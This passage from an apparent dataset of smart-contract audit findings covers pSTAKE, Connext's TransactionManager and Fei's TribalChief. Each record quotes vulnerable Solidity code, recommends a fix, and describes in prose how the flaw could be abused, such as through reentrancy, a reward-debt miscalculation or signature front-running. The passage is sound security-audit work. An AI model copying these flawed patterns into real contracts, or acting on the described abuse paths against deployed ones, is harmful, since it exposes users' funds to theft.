block.timestamp);\\n return true;\\n}\\n```\\n\\nFor all the whitelisted addresses, the `calculateHolderRewards` function is called. But if the `calculateRewards` function is called by the whitelisted address directly, the function will execute, and the rewards will be distributed to the caller instead of the intended recipients.чResolution\\nComment from pSTAKE Finance team:\\nHave created a require condition in Smart Contract code to disallow whitelisted contracts from calling the function\\nWhile this scenario is unlikely to happen, adding the additional check in the `calculateRewards` is a good option.чч```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), \"ST5\");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n -Presence of testnet codeчmediumчBased on the discussions with pStake team and in-line comments, there are a few instances of code and commented code in the code base under audit that are not finalized for mainnet deployment.\\n```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(\"pSTAKE Token\", \"PSTAKE\");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n\\nThe initialize function currently mints all the tokens to msg.sender, however the goal for mainnet is to use a vesting contract which is not present in the current code.чIt is recommended to fully test the final code before deployment to the mainnet.чч```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(\"pSTAKE Token\", \"PSTAKE\");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n -Sanity check on all important variablesчlowчMost of the functionalities have proper sanity checks when it comes to setting system-wide variables, such as whitelist addresses. However there are a few key setters that lack such sanity checks.\\nSanity check (!= address(0)) on all token contracts.\\n```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP9\");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP10\");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP11\");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n\\nSanity check on `unstakingLockTime` to be in the acceptable range (21 hours to 21 days)\\n```\\n/\\*\\*\\n \\* @dev Set 'unstake props', called from admin\\n \\* @param unstakingLockTime: varies from 21 hours to 21 days\\n \\*\\n \\* Emits a {SetUnstakeProps} event with 'fee' set to the stake and unstake.\\n \\*\\n \\*/\\nfunction setUnstakingLockTime(uint256 unstakingLockTime)\\n public\\n virtual\\n returns (bool success)\\n{\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LQ3\");\\n \\_unstakingLockTime = unstakingLockTime;\\n emit SetUnstakingLockTime(unstakingLockTime);\\n return true;\\n}\\n```\\nчResolution\\nComment from pSTAKE Finance team:\\nPost the implementation of new emission logic there have been a rearrangement of some variables, but the rest have been sanity tested and correctedчч```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP9\");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP10\");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP11\");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n -TransactionManager - Receiver-side check also on sending side FixчhighчThe functions `prepare`, `cancel`, and `fulfill` in the `TransactionManager` all have a “common part” that is executed on both the sending and the receiving chain and side-specific parts that are only executed either on the sending or on the receiving side.\\nThe following lines occur in fulfill's common part, but this should only be checked on the receiving chain. In fact, on the sending chain, we might even compare amounts of different assets.\\n```\\n// Sanity check: fee <= amount. Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, \"#F:023\");\\n```\\n\\nThis could prevent a legitimate `fulfill` on the sending chain, causing a loss of funds for the router.чResolution\\nThe Connext team claims to have fixed this in commit `4adbfd52703441ee5de655130fc2e0252eae4661`. We have not reviewed this commit or, generally, the codebase at this point.\\nMove these lines to the receiving-side part.\\nRemark\\nThe `callData` supplied to `fulfill` is not used at all on the sending chain, but the check whether its hash matches `txData.callDataHash` happens in the common part.\\n```\\n// Check provided callData matches stored hash\\nrequire(keccak256(callData) == txData.callDataHash, \"#F:024\");\\n```\\n\\nIn principle, this check could also be moved to the receiving-chain part, allowing the router to save some gas by calling sending-side `fulfill` with empty `callData` and skip the check. Note, however, that the `TransactionFulfilled` event will then also emit the “wrong” `callData` on the sending chain, so the off-chain code has to be able to deal with that if you want to employ this optimization.чч```\\n// Sanity check: fee <= amount. Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, \"#F:023\");\\n```\\n -TransactionManager - Missing nonReentrant modifier on removeLiquidityчmediumчResolution\\nThis issue has been fixed.\\nThe `removeLiquidity` function does not have a `nonReentrant` modifier.\\n```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), \"#RL:007\");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, \"#RL:035\");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, \"#RL:018\");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n\\nAssuming we're dealing with a token contract that allows execution of third-party-supplied code, that means it is possible to leave the `TransactionManager` contract in one of the functions that call into the token contract and then reenter via `removeLiquidity`. Alternatively, we can leave the contract in `removeLiquidity` and reenter through an arbitrary external function, even if it has a `nonReentrant` modifier.\\nExample\\nAssume a token contract allows the execution of third-party-supplied code in its `transfer` function before the actual balance change takes place. If a router calls `removeLiquidity` with half of their shares and then, in a reentering `removeLiquidity` call, supplies the other half of their shares, they will receive more tokens than if they had liquidated all their shares at once because the reentering call occurs after the (first half of the) shares have been burnt but before the corresponding amount of tokens has actually been transferred out of the contract, leading to an artificially increased share value in the reentering call. Similarly, reentering the contract with a `fulfill` call on the receiving chain instead of a second `removeLiquidity` would `transfer` too many tokens to the recipient due to the artificially inflated share value.чWhile tokens that behave as described in the example might be rare or not exist at all, caution is advised when integrating with unknown tokens or calling untrusted code in general. We strongly recommend adding a `nonReentrant` modifier to `removeLiquidity`.чч```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), \"#RL:007\");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, \"#RL:035\");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, \"#RL:018\");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n -TransactionManager - Relayer may use user's cancel after expiry signature to steal user's funds by colluding with a router AcknowledgedчmediumчUsers that are willing to have a lower trust dependency on a relayer should have the ability to opt-in only for the service that allows the relayer to withdraw back users' funds from the sending chain after expiry. However, in practice, a user is forced to opt-in for the service that refunds the router before the expiry, since the same signature is used for both services (lines 795,817 use the same signature).\\nLet's consider the case of a user willing to call `fulfill` on his own, but to use the relayer only to withdraw back his funds from the sending chain after expiry. In this case, the relayer can collude with the router and use the user's `cancel` signature (meant for withdrawing his only after expiry) as a front-running transaction for a user call to `fulfill`. This way the router will be able to withdraw both his funds and the user's funds since the user's `fulfill` signature is now public data residing in the mem-pool.\\n```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n```\\nчThe crucial point here is that the user must never sign a “cancel” that could be used on the receiving chain while fulfillment on the sending chain is still a possibility.\\nOr, to put it differently: A user may only sign a “cancel” that is valid on the receiving chain after sending-chain expiry or if they never have and won't ever sign a “fulfill” (or at least won't sign until sending-chain expiry — but it is pointless to sign a “fulfill” after that, so “never” is a reasonable simplification).\\nOr, finally, a more symmetric perspective on this requirement: If a user has signed “fulfill”, they must not sign a receiving-chain-valid “cancel” until sending-chain expiry, and if they have signed a receiving-chain-valid “cancel”, they must not sign a “fulfill” (until sending-chain expiry).\\nIn this sense, “cancel” signatures that are valid on the receiving chain are dangerous, while sending-side cancellations are not. So the principle stated in the previous paragraph might be easier to follow with different signatures for sending- and receiving-chain cancellations.чч```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n```\\n -ProposedOwnable - two-step ownership transfer should be confirmed by the new ownerчmediumчIn order to avoid losing control of the contract, the two-step ownership transfer should be confirmed by the new owner's address instead of the current owner.\\n`acceptProposedOwner` is restricted to `onlyOwner` while ownership should be accepted by the newOwner\\n```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, \"#APO:030\");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n\\nmove `renounced()` to `ProposedOwnable` as this is where it logically belongs to\\n```\\nfunction renounced() public view override returns (bool) {\\n return owner() == address(0);\\n}\\n```\\n\\n`onlyOwner` can directly access state-var `_owner` instead of spending more gas on calling `owner()`\\n```\\nmodifier onlyOwner() {\\n require(owner() == msg.sender, \"#OO:029\");\\n \\_;\\n}\\n```\\nчResolution\\nAll recommendations given below have been implemented. In addition to that, the privilege to manage assets and the privilege to manage routers can now be renounced separately.\\n`onlyOwner` can directly access `_owner` (gas optimization)\\nadd a method to explicitly renounce ownership of the contract\\nmove `TransactionManager.renounced()` to `ProposedOwnable` as this is where it logically belongs to\\nchange the access control for `acceptProposedOwner` from `onlyOwner` to `require(msg.sender == _proposed)` (new owner).чч```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, \"#APO:030\");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n -FulfillInterpreter - Wrong order of actions in fallback handlingчlowчWhen a transaction with a `callTo` that is not `address(0)` is fulfilled, the funds to be withdrawn on the user's behalf are first transferred to the `FulfillInterpreter` instance that is associated with this `TransactionManager` instance. After that, `execute` is called on that interpreter instance, which, in turn, tries to make a call to `callTo`. If that call reverts or isn't made in the first place because `callTo` is not a contract address, the funds are transferred directly to the `receivingAddress` in the transaction (which becomes `fallbackAddress` in execute); otherwise, it's the called contract's task to transfer the previously approved funds from the interpreter.\\n```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nFor the fallback scenario, i.e., the call isn't executed or fails, the funds are first transferred to `fallbackAddress`, and the previously increased allowance is decreased after that. If the token supports it, the recipient of the direct transfer could try to exploit that the approval hasn't been revoked yet, so the logically correct order is to decrease the allowance first and transfer the funds later. However, it should be noted that the `FulfillInterpreter` should, at any point in time, only hold the funds that are supposed to be transferred as part of the current transaction; if there are any excess funds, these are leftovers from a previous failure to withdraw everything that could have been withdrawn, so these can be considered up for grabs. Hence, this is only a minor issue.чWe recommend reversing the order of actions for the fallback case: Decrease the allowance first, and transfer later. Moreover, it would be better to increase the allowance only in case a call will actually be made, i.e., if `Address.isContract(callTo)` is `true`.\\nRemark\\nThis issue was already present in the original version of the code but was missed initially and only found during the re-audit.чч```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n -FulfillInterpreter - Missing check whether callTo address contains codeчlowчResolution\\nThis issue has been fixed.\\nThe receiver-side `prepare` checks whether the `callTo` address is either zero or a contract:\\n```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), \"#P:031\");\\n```\\n\\nHowever, as a contract may `selfdestruct` and the check is not repeated later, there is no guarantee that `callTo` still contains code when the call to this address (assuming it is non-zero) is actually executed in FulfillInterpreter.execute:\\n```\\n// Try to execute the callData\\n// the low level call will return `false` if its execution reverts\\n(bool success, bytes memory returnData) = callTo.call{value: isEther ? amount : 0}(callData);\\n\\nif (!success) {\\n // If it fails, transfer to fallback\\n Asset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isEther) {\\n Asset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nAs a result, if the contract at `callTo` self-destructs between `prepare` and `fulfill` (both on the receiving chain), `success` will be `true`, and the funds will probably be lost to the user.\\nA user could currently try to avoid this by checking that the contract still exists before calling `fulfill` on the receiving chain, but even then, they might get front-run by `selfdestruct`, and the situation is even worse with a relayer, so this provides no reliable protection.чRepeat the `Address.isContract` check on `callTo` before making the external call in `FulfillInterpreter.execute` and send the funds to the `fallbackAddress` if the result is `false`.\\nIt is, perhaps, debatable whether the check in `prepare` should be kept or removed. In principle, if the contract gets deployed between `prepare` and `fulfill`, that is still soon enough. However, if the `callTo` address doesn't have code at the time of `prepare`, this seems more likely to be a mistake than a “late deployment”. So unless there is a demonstrated use case for “late deployments”, failing in `prepare` (even though it's receiver-side) might still be the better choice.\\nRemark\\nIt should be noted that an unsuccessful call, i.e., a revert, is the only behavior that is recognized by `FulfillInterpreter.execute` as failure. While it is prevalent to indicate failure by reverting, this doesn't have to be the case; a well-known example is an ERC20 token that indicates a failing transfer by returning `false`.\\nA user who wants to utilize this feature has to make sure that the called contract behaves accordingly; if that is not the case, an intermediary contract may be employed, which, for example, reverts for return value `false`.чч```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), \"#P:031\");\\n```\\n -TransactionManager - Adherence to EIP-712 Won't Fixчlowч`fulfill` function requires the user signature on a `transactionId`. While currently, the user SDK code is using a cryptographically secured pseudo-random function to generate the `transactionId`, it should not be counted upon and measures should be placed on the smart-contract level to ensure replay-attack protection.\\n```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\nчConsider adhering to EIP-712, or at least including `address(this), block.chainId` as part of the data signed by the user.чч```\\nfunction recoverSignature(\\n bytes32 transactionId,\\n uint256 relayerFee,\\n string memory functionIdentifier,\\n bytes calldata signature\\n) internal pure returns (address) {\\n // Create the signed payload\\n SignedData memory payload = SignedData({\\n transactionId: transactionId,\\n relayerFee: relayerFee,\\n functionIdentifier: functionIdentifier\\n });\\n\\n // Recover\\n return ECDSA.recover(ECDSA.toEthSignedMessageHash(keccak256(abi.encode(payload))), signature);\\n}\\n```\\n -TransactionManager - Hard-coded chain ID might lead to problems after a chain split PendingчlowчThe ID of the chain on which the contract is deployed is supplied as a constructor argument and stored as an `immutable` state variable:\\n```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n\\n```\\nconstructor(uint256 \\_chainId) {\\n chainId = \\_chainId;\\n interpreter = new FulfillInterpreter(address(this));\\n}\\n```\\n\\nHence, `chainId` can never change, and even after a chain split, both contracts would continue to use the same chain ID. That can have undesirable consequences. For example, a transaction that was prepared before the split could be fulfilled on both chains.чIt would be better to query the chain ID directly from the chain via `block.chainId`. However, the development team informed us that they had encountered problems with this approach as some chains apparently are not implementing this correctly. They resorted to the method described above, a constructor-supplied, hard-coded value. For chains that do indeed not inform correctly about their chain ID, this is a reasonable solution. However, for the reasons outlined above, we still recommend querying the chain ID via `block.chainId` for chains that do support that — which should be the vast majority — and using the fallback mechanism only when necessary.чч```\\n/\\*\\*\\n \\* @dev The chain id of the contract, is passed in to avoid any evm issues\\n \\*/\\nuint256 public immutable chainId;\\n```\\n -TribalChief - A wrong user.rewardDebt value is calculated during the withdrawFromDeposit function callчhighчWhen withdrawing a single deposit, the reward debt is updated:\\n```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n\\nInstead of the `user.virtualAmount` in reward debt calculation, the `virtualAmountDelta` should be used. Because of that bug, the reward debt is much lower than it would be, which means that the reward itself will be much larger during the harvest. By making multiple deposit-withdraw actions, any user can steal all the Tribe tokens from the contract.чUse the `virtualAmountDelta` instead of the `user.virtualAmount`.чч```\\nuint128 virtualAmountDelta = uint128( ( amount \\* poolDeposit.multiplier ) / SCALE\\_FACTOR );\\n\\n// Effects\\npoolDeposit.amount -= amount;\\nuser.rewardDebt = user.rewardDebt - toSigned128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\nuser.virtualAmount -= virtualAmountDelta;\\npool.virtualTotalSupply -= virtualAmountDelta;\\n```\\n -TribalChief - Unlocking users' funds in a pool where a multiplier has been increased is missingчmediumчWhen a user deposits funds to a pool, the current multiplier in use for this pool is being stored locally for this deposit. The value that is used later in a withdrawal operation is the local one, and not the one that is changing when a `governor` calls `governorAddPoolMultiplier`. It means that a decrease in the multiplier value for a given pool does not affect users that already deposited, but an increase does. Users that had already deposited should have the right to withdraw their funds when the multiplier for their pool increases by the `governor`.\\n```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\nчReplace the `<` operator with `>` in `TribalChief` line 152.чч```\\nfunction governorAddPoolMultiplier(\\n uint256 \\_pid,\\n uint64 lockLength,\\n uint64 newRewardsMultiplier\\n) external onlyGovernor {\\n PoolInfo storage pool = poolInfo[\\_pid];\\n uint256 currentMultiplier = rewardMultipliers[\\_pid][lockLength];\\n // if the new multplier is less than the current multiplier,\\n // then, you need to unlock the pool to allow users to withdraw\\n if (newRewardsMultiplier < currentMultiplier) {\\n pool.unlocked = true;\\n }\\n rewardMultipliers[\\_pid][lockLength] = newRewardsMultiplier;\\n\\n emit LogPoolMultiplier(\\_pid, lockLength, newRewardsMultiplier);\\n}\\n```\\n -TribalChief - Unsafe down-castingsчmediumч`TribalChief` consists of multiple unsafe down-casting operations. While the usage of types that can be packed into a single storage slot is more gas efficient, it may introduce hidden risks in some cases that can lead to loss of funds.\\nVarious instances in `TribalChief`, including (but not necessarily only) :\\n```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n\\n```\\npool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n```\\n\\n```\\nuserPoolData.rewardDebt += int128(virtualAmountDelta \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\nчGiven the time constraints of this audit engagement, we could not verify the implications and provide mitigation actions for each of the unsafe down-castings operations. However, we do recommend to either use numeric types that use 256 bits, or to add proper validation checks and handle these scenarios to avoid silent over/under-flow errors. Keep in mind that reverting these scenarios can sometimes lead to a denial of service, which might be harmful in some cases.чч```\\nuser.rewardDebt = int128(user.virtualAmount \\* pool.accTribePerShare) / toSigned128(ACC\\_TRIBE\\_PRECISION);\\n```\\n -TribalChief - Governor decrease of pool's allocation point should unlock depositors' fundsчlowчWhen the `TribalChief` governor decreases the ratio between the allocation point (PoolInfo.allocPoint) and the total allocation point (totalAllocPoint) for a specific pool (either be directly decreasing `PoolInfo.allocPoint` of a given pool, or by increasing this value for other pools), the total reward for this pool is decreased as well. Depositors should be able to withdraw their funds immediately after this kind of change.\\n```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\nчMake sure that depositors' funds are unlocked for pools that affected negatively by calling `TribalChief.set`.чч```\\nfunction set(uint256 \\_pid, uint128 \\_allocPoint, IRewarder \\_rewarder, bool overwrite) public onlyGovernor {\\n totalAllocPoint = (totalAllocPoint - poolInfo[\\_pid].allocPoint) + \\_allocPoint;\\n poolInfo[\\_pid].allocPoint = \\_allocPoint.toUint64();\\n\\n if (overwrite) {\\n rewarder[\\_pid] = \\_rewarder;\\n }\\n\\n emit LogSetPool(\\_pid, \\_allocPoint, overwrite ? \\_rewarder : rewarder[\\_pid], overwrite);\\n}\\n```\\n -TribalChief - new block reward retrospectively takes effect on pools that have not been updated recentlyчlowчWhen the governor updates the block reward `tribalChiefTribePerBlock` the new reward is applied for the outstanding duration of blocks in `updatePool`. This means, if a pool hasn't updated in a while (unlikely) the new block reward is retrospectively applied to the pending duration instead of starting from when the block reward changed.\\nrewards calculation\\n```\\nif (virtualSupply > 0) {\\n uint256 blocks = block.number - pool.lastRewardBlock;\\n uint256 tribeReward = (blocks \\* tribePerBlock() \\* pool.allocPoint) / totalAllocPoint;\\n pool.accTribePerShare = uint128(pool.accTribePerShare + ((tribeReward \\* ACC\\_TRIBE\\_PRECISION) / virtualSupply));\\n}\\n```\\n\\nupdating the block reward\\n```\\n/// @notice Allows governor to change the amount of tribe per block\\n/// @param newBlockReward The new amount of tribe per block to distribute\\nfunction updateBlockReward(uint256 newBlockReward) external onlyGovernor {\\n tribalChiefTribePerBlock = newBlockReward;\\n emit 